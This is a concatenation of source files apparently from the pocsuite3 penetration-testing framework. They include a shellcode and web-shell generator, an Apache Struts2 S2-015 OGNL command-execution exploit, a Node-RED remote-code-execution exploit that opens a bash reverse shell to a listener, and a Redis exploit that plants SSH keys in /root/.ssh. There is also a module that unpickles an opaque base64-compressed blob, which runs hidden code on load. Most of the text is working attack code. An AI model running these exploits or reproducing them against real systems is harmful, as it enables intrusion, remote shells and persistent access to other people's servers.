        Class with shellcodes for operating systems (Linux, Windows, etc)
    """

    def __init__(self, os_target, os_target_arch, connect_back_ip='localhost', connect_back_port=5555, bad_chars=['\x00']):
        """
        Initializes object OSShellcodes.
        :param os_target: (string) "WINDOWS" or "LINUX"
        :param os_target_arch: (string) "32bit" or "64bit"
        :param connect_back_ip: (string) Ip address of machine with enabled shell listener
        :param connect_back_port: (int) Port where listener listen to connection.
        :param bad_chars: (list of strings) Badchars for encoder
        :return:
        """
        self.name = ""
        self.OS_TARGET = os_target
        self.OS_TARGET_ARCH = os_target_arch
        self.CONNECTBACK_IP = connect_back_ip
        self.CONNECTBACK_PORT = connect_back_port
        self.BADCHARS = bad_chars
        self.OS_SYSTEM = system().upper()
        self.OS_ARCH = (architecture())[0]
        self.binary_path = ""
        return

    def create_shellcode(self, _shellcode_type='reverse', command='calc.exe', message='', encode=None, make_exe=0,
                         debug=0, filename="", dll_inj_funcs=[], shell_args={},
                         use_precompiled=True):
        """
        Function for create shellcode.
        :param _shellcode_type: (string) Can be "reverse" or "bind".
        :param command: (string) Command for Windows command-shellcode.
        :param message: (string) Message for "message" for message-shellcode.
        :param encode: (string) Encoder type. Can be "xor", "alphanum", "rot_13", "fnstenv" or "jumpcall". If empty shellcode will not be encoded.
        :param make_exe: (bool) or (int) If True(or 1) exe file will be generated from shellcode.
        :param debug: (bool) or (int) If True(or 1) shellcode will be printed to stdout.
        :param filename: (string) Used for assign special name to executable or dll shellcode.
        :param dll_inj_funcs: (list of strings) Functions names for dll hijacking. If not empty dll with shellcode will be generated.
        :param cloud_generate (bool) Used for generate shellcode on cloud server.
        :return: (string) Generated shellcode.
        """
        generator = ShellGenerator(self.OS_TARGET, self.OS_TARGET_ARCH)
        shellcode, self.binary_path = generator.get_shellcode(_shellcode_type,
                                                              connectback_ip=self.CONNECTBACK_IP,
                                                              connectback_port=self.CONNECTBACK_PORT,
                                                              make_exe=make_exe,
                                                              debug=debug,
                                                              filename=filename,
                                                              dll_inj_funcs=dll_inj_funcs,
                                                              shell_args=shell_args,
                                                              use_precompiled=use_precompiled)
        if encode:
            if debug:
                logger.debug("[] Encode shellcode is on and started")
            e = CodeEncoders(self.OS_SYSTEM, self.OS_TARGET, self.OS_TARGET_ARCH, self.BADCHARS)
            e_shellcode = e.encode_shellcode(shellcode, encode, debug)

            if debug:
                logger.debug("Length of encoded shellcode: %d" % len(e_shellcode))
                logger.debug("[] Encode shellcode finished")
            if e_shellcode:
                shellcode = e_shellcode
        else:
            if debug:
                logger.debug("[] Encode shellcode is off")
        return shellcode

    def get_exe_path(self):
        if os.path.exists(self.binary_path + ".exe"):
            return os.path.normpath(self.binary_path + ".exe")
        return None

    def get_dll_path(self):
        if os.path.exists(self.binary_path + ".dll"):
            return os.path.normpath(self.binary_path + ".dll")
        return None


class WebShell:
    def __init__(self, connect_back_ip='localhost', connect_back_port=5555):
        """
        Class for generating shells for jsp, aspx, python, php
        :param connect_back_ip: (string) Ip address of machine with enabled shell listener
        :param connect_back_port: (int) Port where listener listen to connection.
        """
        self.CONNECTBACK_IP = connect_back_ip
        self.CONNECTBACK_PORT = connect_back_port

    def create_shellcode(self, shell_type, inline=False):
        """
        Creates shellcode of given type
        :param type: (string) aspx, jar, jsp, python, php
        :param inline: (bool) If True all symbols \r, \n, \t will be removed from shellcode
        :return: (string) Generated shellcode
        """
        if shell_type == SHELLCODE_TYPE.JSP:
            shell = JavaShellCode(self.CONNECTBACK_IP, self.CONNECTBACK_PORT, shell_type=SHELLCODE_TYPE.JSP)
        elif shell_type == SHELLCODE_TYPE.JAR:
            shell = JavaShellCode(self.CONNECTBACK_IP, self.CONNECTBACK_PORT, shell_type=SHELLCODE_TYPE.JAR, make_jar=1)
        elif shell_type == SHELLCODE_TYPE.ASPX:
            shell = AspxShellCode(self.CONNECTBACK_IP, self.CONNECTBACK_PORT)
        elif shell_type == SHELLCODE_TYPE.PYTHON:
            shell = PythonShellCode(self.CONNECTBACK_IP, self.CONNECTBACK_PORT)
        elif shell_type == SHELLCODE_TYPE.PHP:
            shell = PhpShellCode(self.CONNECTBACK_IP, self.CONNECTBACK_PORT)
        else:
            print("There is no shellcode of type: {}".format(type))
            return ""
        shellcode = shell.get_shellcode(inline)
        return shellcode, shell


if __name__ == "__main__":
    # Example of generating shellcode for Linux/Windows
    print("[] Generate shellcode started")

    BADCHARS = ["\x00", "\x0a", "\x0d", "\x3b"]

    os_target = OS.LINUX
    os_target_arch = OS_ARCH.X86
    s = OSShellcodes(os_target, os_target_arch, '192.168.1.9', 4443, BADCHARS)
    dll_funcs = ["pcap_findalldevs", "pcap_close", "pcap_compile", "pcap_datalink", "pcap_datalink_val_to_description",
                 "pcap_dump", "pcap_dump_close", "pcap_dump_open", "pcap_file", "pcap_freecode", "pcap_geterr",
                 "pcap_getevent", "pcap_lib_version", "pcap_lookupdev", "pcap_lookupnet", "pcap_loop", "pcap_open_live",
                 "pcap_open_offline", "pcap_setfilter", "pcap_snapshot", "pcap_stats"]

    shellcode_type = 'bind'
    shellcode = s.create_shellcode(
        shellcode_type,
        encode='',
        make_exe=1,
        debug=1,
        # dll_inj_funcs=dll_funcs,
        filename=shellcode_type,
        # use_precompiled=False
    )
    # print(shellcode)
    print("[] Generate shellcode finished")



import unittest
from pocsuite3.lib.core.register import PocLoader


class TestCase(unittest.TestCase):
    def setUp(self):
        pass

    def test_module_is_none(self):
        p = PocLoader('testcase', 'testcase')
        p.set_data('''install_requires = ['', ""]''')
        p.check_requires(p.data)

    def test_built_in_module(self):
        p = PocLoader('testcase', 'testcase')
        p.set_data('''install_requires = ['os', 'sys']''')
        p.check_requires(p.data)

    def test_normal_module(self):
        p = PocLoader('testcase', 'testcase')
        p.set_data('''install_requires = ['setuptools']''')
        p.check_requires(p.data)

    def test_module_include_version(self):
        p = PocLoader('testcase', 'testcase')
        p.set_data('''install_requires = ['setuptools==51.1.2']''')
        p.check_requires(p.data)

        p.set_data('''install_requires = ['setuptools~=51.1.2']''')
        p.check_requires(p.data)

        p.set_data('''install_requires = ['setuptools>=51.1.2']''')
        p.check_requires(p.data)

        p.set_data('''install_requires = ['setuptools<=51.1.2']''')
        p.check_requires(p.data)

    def test_import_name_and_install_name_are_inconsistent(self):
        p = PocLoader('testcase', 'testcase')
        p.set_data('''install_requires = ['BeautifulSoup4>=4.9.1:bs4']''')
        try:
            p.check_requires(p.data)
        except SystemExit:
            pass


if __name__ == '__main__':
    unittest.main()



from collections import OrderedDict
from urllib.parse import quote, unquote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, get_middle_text
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2033-11-15'
    createDate = '2023-11-15'
    updateDate = '2023-11-15'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-015']
    name = 'Apache Struts2 s2-015'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - Struts 2.3.14.2'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-015:影响版本Struts 2.0.0-2.3.14.2;'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('ls', description="可执行的shell命令")
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        hash_str = random_str(10)
        command = [
            "echo " + hash_str,
            "cmd.exe /c echo " + hash_str
        ]
        for cmd in command:
            html = self.exp(cmd)

            if hash_str in html:
                result["VerifyInfo"] = {
                    "URL": self.url,
                }

            return result
        return False

    def exp(self, command):
        exec_payload = "%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream())%2C%23q%7D"
        payload = exec_payload.format(cmd=quote(command))
        html = requests.get(self.url + "/{payload}.action".format(payload=payload)).text
        return html

    def _attack(self):
        result = {}
        p = self._check()
        if p:
            command = self.get_option("command")
            html = self.exp(command)
            text = get_middle_text(html, "HTTP Status 404 - ", ".jsp")
            if text:
                result["VerifyInfo"] = {
                    "URL": self.url,
                    "HTML": unquote(text).replace("\x00", "").encode()
                }

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



import os
import socket
import zlib
import pickle
import base64
import select
import threading
from pocsuite3.lib.core.poc import POCBase
from pocsuite3.lib.utils import random_str
from pocsuite3.lib.core.common import check_port
from pocsuite3.lib.core.data import conf, logger


def read_inputs(s):
    buffer = []
    try:
        while True:
            chunk = s.recv(1)
            if not chunk or chunk == b'\n':
                break
            buffer.append(chunk)
    except Exception:
        pass
    return b''.join(buffer)


def read_until(conn, inputs):
    try:
        while True:
            msg = conn.recv(1024).decode('utf-8', errors='ignore')
            if inputs in msg.lower():
                break
    except Exception:
        pass


def read_results(conn, inputs):
    if callable(conn):
        results = conn(inputs.decode())
        if not isinstance(results, bytes):
            results = results.encode()
        if results.strip() == b'':
            results = b'COMMAND NO OUTPUT\n'
        return results
    elif isinstance(conn, socket.socket):
        flag = random_str(6).encode()
        inputs = inputs.strip() + b';' + flag + b'\n'
        conn.send(inputs)
        count = 10
        results = b''
        while count:
            count -= 1
            ready = select.select([conn], [], [], 0.2)
            if ready[0]:
                chunk = conn.recv(1024)
                results += chunk
            if results.count(flag) >= 2:
                break
        results = results.split(inputs.strip())[-1]
        results = os.linesep.encode().join(
            results.split(flag)[0].splitlines()[0:-1])
        return results.strip() + b'\n'
    return b'\n'


def flow_redirect(conn):
    s = socket.socket()
    s.connect((conf.connect_back_host, conf.connect_back_port))
    while True:
        inputs = read_inputs(s)
        results = read_results(conn, inputs)
        s.send(results)


def start_listener(conn):
    t = threading.Thread(target=flow_redirect,
                         name="bind-listener-thread",
                         args=[conn])
    t.setDaemon(True)
    t.start()


def bind_shell(obj, rce_func='_rce', check=True):
    if not (isinstance(obj, POCBase) and hasattr(obj, rce_func)
            and callable(getattr(obj, rce_func))):
        return False
    conn = getattr(obj, rce_func)
    if check:
        flag = random_str(6).encode()
        if flag not in read_results(conn, b'echo %s' % flag):
            return False
    start_listener(conn)


def bind_tcp_shell(host, port, check=True):
    if not check_port(host, port):
        return False
    try:
        s = socket.socket()
        s.connect((host, port))
        if check:
            flag = random_str(6).encode()
            if flag not in read_results(s, b'echo %s' % flag):
                return False
        start_listener(s)
    except Exception as e:
        logger.error(str(e))


def bind_telnet_shell(host, port, user, pwd, check=True):
    # see https://peps.python.org/pep-0594/#telnetlib
    if not check_port(host, port):
        return False
    try:
        tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tn.connect((host, port))
        read_until(tn, 'login: ')
        tn.sendall((user + "\n").encode('utf-8'))
        read_until(tn, 'password: ')
        tn.sendall((pwd + "\n").encode('utf-8'))
        if check:
            flag = random_str(6).encode()
            if flag not in read_results(tn, b'echo %s' % flag):
                return False
        start_listener(tn)
    except Exception as e:
        logger.error(str(e))


class BIND_PAYLOAD:
    payload = (
        b'eJy1GE1v28g1200/4EOBntrexqxjky1NyW52E4eWW0WWd7VrS4KkNAmygUFRI4sx'
        b'NWQ5QzuOLKCXXgpdCqj/oP+wQM99b2YoUzLtJC3KIDLnfX/Ne8P5y8N//PxXD+Qz'
        b'nZuzh83WYX0++yeLBpRsU7LFRxV/FISD0ziJfMq5w2PvkplGqR+wEh8ZlsuocPyE'
        b'eoJ2aXJBE3OYMl8EETP9MKBMWJOJenHiIKYmHzlcDAJmueotSjVCU2swTZJl8HRq'
        b'OWHABQXlk/LUsLbmsx81a/PZL5lPtkOyHRMAo83atPnsx91Wrdqbz5o88j1BerX2'
        b'9nGj26s3nwGlndCUU28wSOxhlJyT+qt67ZlmtWNxZSsjbE4FDwY2D84CJmzuMTqf'
        b'ffldtz1/9bNfPHiw/+iPJPbOqPypMz8Cz84qRiqG208N8uhgbUEQjOMoERXjnXfh'
        b'OUHk/DZD38aGHjtzEjoMqS+cWsS4SFJfRMkncpxQMYoG92jHjHUj/5yKe4hSEYRO'
        b'1/cYo5ni9TUCT5z2w8AnXHgC/nRFAh6ThELmOYWVqSFgtEUmkgOfhIo0YYTRS83y'
        b'PIWqgmpBOkezm5YjIoU2LVfyTtdA9dr+t72TYzBBBCKkB9+lXJCjKCFHKdsvKdja'
        b'/vPW4Wv4c9TqnJCTeu/b1mHFaLe6PYM0qyf1igFZHhukWus1Ws2K8RvjQMrfbzTb'
        b'L3qk97oNJIK+Fxm5Px4PPkYzhl1ikAsvTGnF8MS5QUbBYEBZARtP++MAGP9UPX4B'
        b'y6PwCoTvl9BaDK1k8EOPcwwP9caQdkYx6QT0UTbgpDcC+CAX0gaLU6GoCb9wF/BW'
        b'Km4QInbXFpgV0eayBHuVM58/fMQogP1/QSpL6hYYEQMG9WXQ6Y1mXTQXUTAgScrM'
        b'VdHP0+GQJnTQARdpQj54IIqlYegWUr1MAgFUo3dJIZlIrlbE46NkQv0t6zIRlAuE'
        b'hmpfLcu9JUirzUlS9khJ+RBqsA5OkSh/5CWkL6W8eauFIuzN05293be36aEFkZCy'
        b'MzG6jbuENk2JaSo8CPvgOVgxppJvk7KtVTmKxLLIASmvZiLnpXOJDuT5NeNt5RnH'
        b'MEz5yCwgmC5BpgQasj8iZv29T2McFoSuGjL9hJwGQ2JCXtdVFViFZkEY/DDC5lIQ'
        b'T+DHdN4rAP0qlPB5XkzXbn51j4xwxxjfRII0I0YNN48bQja7NPYSD5tARYMd2Wxa'
        b'QzMbI0dA5vCMrga1o418HkUh9RgJ+MuAKRB6uyTWoX9OvZCbxg8/GFbecsmEuzlJ'
        b'qe7DhIacFpAMQUBGk7cfeyOgE1BBuXDOqGiD0jHFHaEap3VjlSTWSSCbm5J5YRw2'
        b'1iXrtAZ/PLhTgezeVq711WRvhQ774QMwyZUDE6EJDGZueBkUujRLO84Z80IHYvzO'
        b'yO/b3DAmAwrSYPPnYRWlAY05vI3O108BN6RRVH08ZAX9kJoY+xxDq/8OmjaJQEcR'
        b'L3SOBqw85i+VqToLED6KLouMU+ilAPj0PaTG1kF+89aRUyknMkNg/PkNGNMoa2J1'
        b'ByCZbm0Z6+RmIZtm/0pQgO7t2WSnLH+g1zz+Gl924Ge3LN+mYFUx4+MnNvn6CeJB'
        b'2TQ3gFaL9vPsQbF7T1H3V/CzgzY9wRdclR/fYw4Q7O0VmLOazIBdROe4SzA/jlqZ'
        b'kU1MhbekrfkqbqtDONGHceA0NcjSwnJ5Umc3wv3MWwUws5M81EFu7pmW5cCB+JCG'
        b'wViOLWgKVSOXd9msuO+MPN6EMwmM8D/gkqn3Z4C/oQX4UsecftpO5yNKw8K9Pooi'
        b'OPPdtdslNm8rzsk4gsMssDSYoGcw9KDncQoLs1iGJF/a7LdHjjamO6Jh2PZWh/Cd'
        b'O0CyZjxLpfdZ1b86fApq+9M0fayuVxStLS1zjXQHNNzTSgU996OuA6fX241USrq/'
        b'me5kDWvnrnaKLkn14JMej7JZ2Zh/9brqTJGe+/uuDKn8WCJc/YFNpwBWsbh8K5aV'
        b'aatazG/klUj+DyPpEyL5GWPpjhh9PET/3XjC5/8wovC5r1Xe1W6XZsJiH63WkKnJ'
        b'lj6l7mqqtq4aROS/DaDdWg4EJBGr8SgUfyNkRXpO78fFf+zAmh1R8Wu/3anrz9hH'
        b'Fez9CCtJ4H5Jf2qX1Fd54/DZ2nz2k/Zr+OZuzmf/iq8gY4xs+2RL3SjoENgRt+Ez'
        b'WFvs8op2Sv3JXKwenTaa9Z6tl91W7fvTbq9Tr55YLnf6ARuYplF25D/DnpSnFsL1'
        b'zdBXluvbXoU7no8Ogu8RdwZpvGv6Dp58WQQxKxdCdwqhu5YbV26MdnwvDM03i9sv'
        b'29gOjLd4FfWwXe8cz2f/jmkSyoszmKW6b7gbcQXsdLWfXbutXcz5ZkP+QIeI+lcM'
        b'978h/Bi3ufS3K4OBV1WnATM3Yps0mtXDw85ptfkaaLTvXZB3Un1VazWblgt9xES9'
        b'Og41uwuRwYlMatZkEsVI3ztsNG3jYLMGkzODtF70VkH1TicDwb7z9dVf3+MjAs7j'
        b'xZwL/n/Z/rY9f7X+xYMH8Sgm2wnZ2sgSfKpuB81qgdvd1vFpr9a2dHBOpb8b3F7O'
        b'cIbVngIesrXhh5kC7eUG9AD5FWzugJPB0FzXePUdCwy2sUEMSKpF3weQl4BlEuSH'
        b'MhLA8EXR40EllgEwgAjSnBiZ6PUhjYYmUligZGNcGULqfAVwb+nbGNvQA0M0emxh'
        b'rKZTLJbOi+ev57O/JWn/CmKl5wpWDdqFBwm8koQdAqFRl6rYQPW9p7bDX1T5AgJG'
        b'+9gIIAyNlqPsB6C0fjK5DqJr34kTPBvBhyN6PJ1SNnDhPyawWdudz46SMSmJcVwa'
        b'uuPzYTCMshVeoKrXa138kH2ye7C5cy3vXy/U9euBogFx1Zffz2d/9y7Pydbz+jeN'
        b'5mTCK0YpYFSUoLZLQFwql8qGO4hkqkx+vQmmh0BAfGu/Urb6YOG5CygfjFcemv6C'
        b'yDooW8qXjfL1JlfFDaQYYaLjsV4xMJ6GpZDcksH/aa9+DGV4OJ/9WtAQ7Bng9fHC'
        b'KemHDMfv57NzCMd2MiwMyfX1+JzB4FIrErtm/iL6WoUFX63y/nLkdJBk9NxFwOez'
        b'Lzrz2V87WAcG399WVaFHAF6ny8tZvLnuh4DCe+Ze50Xd5rJA1DumvLKV/G4rqwmE'
        b'YviwII8hbNzEvKs3eb1+s8RNZVk2RsmYp85/AMfBUyk='
    )
    vars().update(pickle.loads(zlib.decompress(base64.b64decode(payload))))
    del payload



import os
import time
import json
from pocsuite3.api import PLUGIN_TYPE
from pocsuite3.api import PluginBase
from pocsuite3.api import logger
from pocsuite3.api import register_plugin, paths, conf


class FileRecord(PluginBase):
    category = PLUGIN_TYPE.RESULTS
    filename = conf.output_path or os.path.join(paths.POCSUITE_OUTPUT_PATH, "{}.txt".format(int(time.time())))
    file = None

    def init(self):
        debug_msg = "[PLUGIN] file_record plugin init..."
        logger.debug(debug_msg)
        logger.info("[PLUGIN] The result will be recorded in {}".format(self.filename))
        if os.path.exists(self.filename):
            raise Exception("The {} has existed".format(self.filename))
        self.file = open(self.filename, 'a+')

    def handle(self, output):
        status = output.get("status")
        if status and status == "success":
            poc_name = output.get("poc_name")
            target = output.get("target")
            created = output.get("created")
            result = output.get("result")
            msg = {
                "target": target,
                "poc_name": poc_name,
                "result": result,
                "created_time": created
            }
            self.file.write(json.dumps(msg) + '\n')

    def start(self):
        self.file.close()
        msg = "[PLUGIN] File saved in {}".format(self.filename)
        logger.info(msg)


register_plugin(FileRecord)



"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit https://pocsuite.org
"""
import asyncio
import json
import re

import websockets

from pocsuite3.api import POCBase, Output, register_poc, logger, requests, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = '97536'
    version = '3'
    author = ['seebug']
    vulDate = '2015-10-26'
    createDate = '2015-10-26'
    updateDate = '2015-12-09'
    references = ['https://www.seebug.org/vuldb/ssvid-97536']
    name = 'Node-RED 未授权远程命令执行'
    appPowerLink = 'http://redis.io/'
    appName = 'Node-RED'
    appVersion = 'All'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
        默认情况下，Node-RED 应用程序不会强制执行任何类型的身份验证，因此可以未授权公开访问，攻击
        者通过组合特定的 Flows 可以在目标系统上执行任意命令。此外，未授权滥用其他 Node还可实现
        SSRF、本地文件包含、信息泄漏等攻击。
        '''
    samples = ['']
    install_requires = ['websockets']
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _verify(self):
        result = {}

        username = 'admin'
        password = 'password'
        command = 'id'
        pattern = r'uid|gid|groups'
        try:
            output = start(self.url, command, username, password)
            if output and re.search(pattern, output, re.I):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Username'] = username
                result['VerifyInfo']['Password'] = password
        except Exception as ex:
            logger.error(str(ex))
        return self.parse_attack(result)

    def _attack(self):
        self._verify()

    def _shell(self):
        username = 'admin'
        password = 'password'
        command = REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port())
        try:
            start(self.url, command, username, password, shell=True)
        except Exception as ex:
            logger.error(str(ex))

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def parse_verify(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


FLOW_NAME = random_str(5)
INJECT_BLOCK_NAME = random_str(5)
EXEC_BLOCK_NAME = random_str(5)
DEBUG_BLOCK_NAME = random_str(5)

EXEC_FLOW = [
    {
        "id": FLOW_NAME,
        "type": "tab",
        "label": FLOW_NAME,
        "disabled": False,
        "info": ""
    },
    {
        "id": INJECT_BLOCK_NAME,
        "type": "inject",
        "z": FLOW_NAME,
        "name": "",
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "repeat": "",
        "crontab": "",
        "once": False,
        "onceDelay": 0.1,
        "x": 214,
        "y": 307,
        "wires": [
            [
                EXEC_BLOCK_NAME
            ]
        ]
    },
    {
        "id": EXEC_BLOCK_NAME,
        "type": "exec",
        "z": FLOW_NAME,
        "command": "",
        "addpay": False,
        "append": "",
        "useSpawn": "False",
        "timer": "",
        "oldrc": False,
        "name": "",
        "x": 411,
        "y": 318.5,
        "wires": [
            [
                DEBUG_BLOCK_NAME
            ],
            [
                DEBUG_BLOCK_NAME
            ]
        ]
    },
    {
        "id": DEBUG_BLOCK_NAME,
        "type": "debug",
        "z": FLOW_NAME,
        "name": "",
        "active": True,
        "tosidebar": True,
        "console": False,
        "tostatus": False,
        "complete": "false",
        "x": 618,
        "y": 315,
        "wires": []
    }
]


def merge_lists(list_1, list_2, key):
    merged = {}
    for item in list_1 + list_2:
        if item[key] not in merged:
            merged[item[key]] = item
    return [val for (_, val) in merged.items()]


def need_auth(url):
    response = requests.get("{}/settings".format(url))
    if response.status_code == 401:
        return 1
    return 0


def login(url, username="admin", password="password"):
    data = {
        "client_id": "node-red-editor",
        "grant_type": "password",
        "scope": "",
        "username": username,
        "password": password
    }
    response = requests.post("{}/auth/token".format(url), data=data, verify=False)
    if response.status_code == 200:
        return response.json()["access_token"]
    return None


async def exploit(url, command, shell=False, access_token=None):
    ws_url = url.replace("http", "ws")
    headers = {"Node-RED-API-Version": "v2"}

    if access_token is not None:
        headers["Authorization"] = "Bearer {}".format(access_token)

    async with websockets.connect("{}/comms".format(ws_url)) as websocket:
        if access_token is not None:
            await websocket.send(json.dumps({"auth": access_token}))
            while True:
                response = await websocket.recv()
                message = json.loads(response)
                if "auth" in message and message["auth"] == "ok":
                    print("[+] Successfully authenticated over WebSocket.")
                    break

        print("[+] Establishing RCE link ....")
        await websocket.send(json.dumps({"subscribe": "debug"}))
        current_flows = {"flows": []}
        try:
            resp = requests.get("{}/flows".format(url), headers=headers)
            if "flows" in resp.json():
                current_flows["flows"] = resp.json()["flows"]
            payload = {"flows": merge_lists(current_flows["flows"], EXEC_FLOW, "id")}
            for flow in payload["flows"]:
                if flow["id"] == EXEC_BLOCK_NAME:
                    flow["command"] = command

            resp = requests.post(
                "{}/flows".format(url),
                json=payload,
                headers=headers
            )

            resp = requests.post("{}/inject/{}".format(url, INJECT_BLOCK_NAME), headers=headers)

            output = None
            if not shell:
                while output is None:
                    response = await websocket.recv()
                    messages = json.loads(response)
                    for message in messages:
                        if "topic" in message and message["topic"] == "debug":
                            output = message["data"]["msg"].strip()
                            break

        except KeyboardInterrupt:
            payload = {"flows": []}
            for current_block in current_flows["flows"]:
                tainted = False
                for block in EXEC_FLOW:
                    if block["id"] == current_block["id"]:
                        tainted = True
                if not tainted:
                    payload["flows"].append(current_block)

            print("\n[+] Cleaning up workflows.")
            resp = requests.post(
                "{}/flows".format(url),
                json=payload,
                headers=headers
            )
            if resp.status_code == 200:
                print("[+] Done.")
            else:
                print("[!] An error occured. Manual cleanup might be required.")
        finally:
            websocket.close()
        return output


def start(url, command, username, password, shell=False):
    if need_auth(url):
        print("[+] Node-RED requires authentication.")
        if username is None and password is None:
            print("[+] Trying default credentials.")
            access_token = login(url)
        else:
            print("[+] Trying provided credentials.")
            access_token = login(url, username=username, password=password)

        if access_token is None:
            print("[!] An error occured during login procedure. Wrong creds ?")
            return
        else:
            print("[+] Successfully authenticated over HTTP.")
            return asyncio.get_event_loop().run_until_complete(exploit(url, command, shell, access_token))
    else:
        print("[+] Node-RED does not require authentication.")
        return asyncio.get_event_loop().run_until_complete(exploit(url, command, shell))


register_poc(DemoPOC)



from pocsuite3.api import PluginBase
from pocsuite3.api import PLUGIN_TYPE
from pocsuite3.api import logger
from pocsuite3.api import conf
from pocsuite3.api import ZoomEye
from pocsuite3.api import register_plugin
from pocsuite3.lib.core.exception import PocsuitePluginDorkException


class TargetFromZoomeye(PluginBase):
    category = PLUGIN_TYPE.TARGETS

    def init_zoomeye_api(self):
        self.zoomeye = ZoomEye(token=conf.zoomeye_token)
        info_msg = "[PLUGIN] ZoomEeye search limit {0}".format(self.zoomeye.points + self.zoomeye.zoomeye_points)
        logger.info(info_msg)

    def init(self):
        self.init_zoomeye_api()
        dork = None
        if conf.dork_zoomeye:
            dork = conf.dork_zoomeye
        else:
            dork = conf.dork
        if not dork:
            msg = "Need to set up dork (please --dork or --dork-zoomeye)"
            raise PocsuitePluginDorkException(msg)
        if conf.dork_b64:
            dork = dork

        info_msg = "[PLUGIN] try fetch targets from zoomeye with dork: {0}".format(dork)
        logger.info(info_msg)
        targets = self.zoomeye.search(dork, conf.max_page, conf.page_size, search_type=conf.search_type)
        count = 0
        if targets:
            for target in targets:
                if self.add_target(target):
                    count += 1

        info_msg = "[PLUGIN] got {0} target(s) from zoomeye".format(count)
        logger.info(info_msg)


register_plugin(TargetFromZoomeye)



"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit https://pocsuite.org
"""

import socket
from pocsuite3.api import POCBase, Output, register_poc, logger, POC_CATEGORY, VUL_TYPE


class DemoPOC(POCBase):
    vulID = '89339'
    version = '3'
    author = ['seebug']
    vulDate = '2015-10-26'
    createDate = '2015-10-26'
    updateDate = '2015-12-09'
    references = ['http://sebug.net/vuldb/ssvid-89339']
    name = 'Redis 未授权访问'
    appPowerLink = 'http://redis.io/'
    appName = 'Redis'
    appVersion = 'All'
    vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
    desc = '''
        redis 默认不需要密码即可访问，黑客直接访问即可获取数据库中所有信息，造成严重的信息泄露。
        说明：“此版本通过生成公钥写入redis文件后直接运行此脚本可在服务器上/root/.ssh文件下生成公钥”
    '''
    samples = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE
    protocol = POC_CATEGORY.PROTOCOL.REDIS

    def _verify(self):
        result = {}
        payload = b'\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
        s = socket.socket()
        socket.setdefaulttimeout(10)
        try:
            host = self.getg_option("rhost")
            port = self.getg_option("rport") or 6379
            s.connect((host, port))
            s.send(payload)
            recvdata = s.recv(1024)
            if recvdata and b'redis_version' in recvdata:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['Info'] = "Redis未授权访问"
                result['VerifyInfo']['URL'] = host
                result['VerifyInfo']['Port'] = port
        except Exception as ex:
            logger.error(str(ex))
        finally:
            s.close()
        return self.parse_verify(result)

    def _attack(self):
        result = {}
        payload = b'\x63\x6f\x6e\x66\x69\x67\x20\x73\x65\x74\x20\x64\x69\x72\x20\x2f\x72\x6f\x6f\x74\x2f\x2e\x73\x73\x68\x2f\x0d\x0a'
        payload2 = b'\x63\x6f\x6e\x66\x69\x67\x20\x73\x65\x74\x20\x64\x62\x66\x69\x6c\x65\x6e\x61\x6d\x65\x20\x22\x61\x75\x74\x68\x6f\x72\x69\x7a\x65\x64\x5f\x6b\x65\x79\x73\x22\x0d\x0a'
        payload3 = b'\x73\x61\x76\x65\x0d\x0a'
        s = socket.socket()
        socket.setdefaulttimeout(10)
        try:
            host = self.getg_option("rhost")
            port = self.getg_option("rport") or 6379
            s.connect((host, port))
            s.send(payload)
            recvdata1 = s.recv(1024)
            s.send(payload2)
            recvdata2 = s.recv(1024)
            s.send(payload3)
            recvdata3 = s.recv(1024)
            if recvdata1 and b'+OK' in recvdata1:
                if recvdata2 and b'+OK' in recvdata2:
                    if recvdata3 and b'+OK' in recvdata3:
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['Info'] = "Redis未授权访问EXP执行成功"
                        result['VerifyInfo']['URL'] = host
                        result['VerifyInfo']['Port'] = port
        except Exception as ex:
            logger.error(str(ex))
        finally:
            s.close()
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def parse_verify(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)
